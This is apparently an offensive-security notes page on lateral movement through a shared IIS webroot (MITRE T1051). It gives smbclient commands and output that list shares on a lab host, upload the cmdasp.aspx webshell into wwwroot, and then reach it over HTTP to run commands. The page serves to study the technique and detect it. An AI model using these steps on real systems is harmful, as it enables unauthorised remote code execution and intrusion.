Shared Webroot
Lateral Movement

Execution

Enumerating victim host 10.0.0.6 for any shares:
1
smbclient -L //10.0.0.6 -U spot
2
3
WARNING: The "syslog" option is deprecated
4
Enter WORKGROUP\spot's password:
5
6
Sharename Type Comment
7
--------- ---- -------
8
ADMIN$ Disk Remote Admin
9
C$ Disk Default share
10
CertEnroll Disk Active Directory Certificate Services share
11
IPC$ IPC Remote IPC
12
NETLOGON Disk Logon server share
13
SYSVOL Disk Logon server share
14
temp Disk
15
tools Disk
16
transcripts Disk
17
wwwroot Disk
Copied!
Logging in to the wwwroot share:
1
smbclient //10.0.0.6/wwwroot -U spot
2
3
WARNING: The "syslog" option is deprecated
4
Enter WORKGROUP\spot's password:
5
Try "help" to get a list of possible commands.
6
smb: \> ls
7
. D 0 Sat Aug 25 16:57:52 2018
8
.. D 0 Sat Aug 25 16:57:52 2018
9
aspnet_client D 0 Tue Jul 31 20:11:20 2018
10
iis-85.png A 99710 Tue Jul 31 19:35:48 2018
11
iisstart.htm A 3 Tue Jul 31 19:38:23 2018
Copied!
Uploading a webshell into the wwwroot:
1
put /usr/share/webshells/aspx/cmdasp.aspx c.aspx
2
3
putting file /usr/share/webshells/aspx/cmdasp.aspx as \c.aspx (341.8 kb/s) (average 341.8 kb/s)
4
smb: \> ls
5
. D 0 Sat Aug 25 16:59:47 2018
6
.. D 0 Sat Aug 25 16:59:47 2018
7
aspnet_client D 0 Tue Jul 31 20:11:20 2018
8
c.aspx A 1400 Sat Aug 25 16:59:47 2018
9
iis-85.png A 99710 Tue Jul 31 19:35:48 2018
10
iisstart.htm A 3 Tue Jul 31 19:38:23 2018
11
12
6463487 blocks of size 4096. 3032260 blocks available
Copied!
Same as above in a picture:
Attacker can now access the newly uploaded webshell via http://10.0.0.6/c.aspx and start executing commands:

Observations

See T1108: Webshells for observations:

References

https://attack.mitre.org/wiki/Technique/T1051
attack.mitre.org
Last modified 2yr ago